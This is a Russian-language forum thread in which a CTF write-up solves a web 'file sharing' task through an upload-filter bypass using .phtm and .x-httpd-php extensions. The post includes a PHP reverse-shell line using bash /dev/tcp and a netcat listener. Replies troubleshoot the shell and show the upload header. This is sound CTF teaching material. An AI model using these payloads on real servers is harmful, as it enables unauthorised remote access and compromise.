![]() |
Рассмотрим таск под названием - Файлообменник из категории Веб.
Ссылка на задание: Игры Кодебай | CTF-платформа Данный таск интересен тем, что он как бы и легкий, а как бы и нет. В нем необходимо, просто внимательно смотреть =) https://forum.antichat.xyz/attachmen...3575462212.png И так приступим: Начнем с того, что сначала мы смотрим что дано в самом задании, кроме IP и порта, иногда там могут быть хинты. В данном таске есть файл — task.zip, качаем его — он нам еще пригодиться, не просто же он нам дан. https://forum.antichat.xyz/attachmen...3575477488.png Заходим на IP:порт и первое что мы замечаем, есть возможность загрузить файл. Сразу приходим на ум, что есть уязвимость вида: File Upload. Забегая веред, она там есть. https://forum.antichat.xyz/attachmen...3575546010.png Пытаемся ее воспользоваться. Открываем в BurpSuite, и грузим файл вида file.php с содержимым: PHP: Код:
& /dev/tcp/IP/1234 0>&1'"); ?>https://forum.antichat.xyz/attachmen...3575603488.png Значит надо изменить расширение файла, воспользовавшись Google, найдем на популярном сайте book.hacktricks.xyz (File Upload) расширения PHP. https://forum.antichat.xyz/attachmen...3575682483.png Воспользуемся расширением *.phtm https://forum.antichat.xyz/attachmen...3575694736.png Файл загрузился. Открываем данный файл в браузере, и видим, что данный файл не исполняется, значит данная директория заблокирована на исполнение файлов. https://forum.antichat.xyz/attachmen...3575725526.png Первое, что приходит в голову, файл .htaccess. Вот тут нам и понадобиться тот файл (task.zip). Находим файл .htaccess и анализируем. Видим 20 строчку, где сказано, что нам разрешено загрузку файлов с расширением .x-httpd-php. https://forum.antichat.xyz/attachmen...3575753031.png Воспользуемся этим. https://forum.antichat.xyz/attachmen...3575770461.png Запускаем у себя NetCat (nc -lnvp 1234) и открываем файл. https://forum.antichat.xyz/attachmen...3575805997.png https://forum.antichat.xyz/attachmen...3575812534.png Попадаем на сервак и ищем файл fl4g.txt, где и лежит наш флаг. https://forum.antichat.xyz/attachmen...3575833550.png Надеюсь статья была полезна для Вас! Если найдете неточности или ошибки - обязательно напишите об этом в комментариях к статье. |
Хороший райтап. Давай больше на тему веб!
|
Цитата:
|
Цитата:
|
Здравствуйте! Классный Writeup, я осознал, для чего нужен файл .htaccess и почему мы меняем расширение загружаемого файла на .x-httpd-php но на предпоследнем шаге - "Запускаем у себя NetCat (nc -lnvp 1234) и открываем файл." беда, скрипт внутри файла не отрабатывает. Я не попадаю на сервер страница долго обновляется и все - белый экран. Если вам не сложно направьте меня в какую сторону думать)? Proxy я отключаю если что перед тем как переходить по ссылке с x-httpd-php файлом.
|
Цитата:
|
Цитата:
|
Цитата:
Про скрипт & /dev/tcp/IP/port 0>&1'"); ?> ---> & /dev/tcp/0.0.0.0:9898 0>&1'"); ?> верно ли я понял? |
Цитата:
|
Цитата:
Доброго времени суток, уважаемые форумчане! Очередная статья будет посвящена еще одному проблемному вопросу, с которым часто приходится сталкиваться студентам курса WAPT при решении задач – это получение обратного шелла. Нет, в принципе вопрос не сложный и многие наверняка сталкивались с таким... codeby.net |
Добрый вечерок всем!
Я тут тоже недавно ковырялся с этой задачкой. Из исходников было понятно про запрет на загрузку файлов с определенными расширениями, но в итоге гугление и приложенный к таску файл .htaccess помогли мне решить вопрос с исполнением php-кода. А вот дальше я пошел более простым путем, чем автор. Честно говоря даже не думал о таком способе решения, как это сделал автор - сложно для новичка (я про себя) - что-то там (сервер) поднимать, прослушивать... Просто сделал вот так, как в коде ниже (команды 'ls ' добавлял по очереди) и, таким образом добрался до флага. HTML: Код:
Content-Disposition: form-data; name="file"; filename="zev1.x-httpd-php" |
Цитата:
|
Цитата:
|
спасибо
|
А я так и не решил эту задачу. Изучал код. Даже и не подумал взглянуть на другие расширения, думал, что там на все php файлы запрет. Пробовал с подменой .php%00 в именах файлов. Пробовал html файл загрузить со скриптом js, но ajax GET запрос не хотел идти вверх по каталогу. Последнее до чего додумался, это написать file.apurva%2Ephp, он как бы разрешал загружать такой файл, но в uploads сохранялся именно в таком виде, как я привел в примере. А оказывается, что нужно было в htaccess посмотреть, хотя я в него вроде смотрел, но ничего такого не обнаружил, хотя может это было из другого задания.
|
| Время: 12:09 |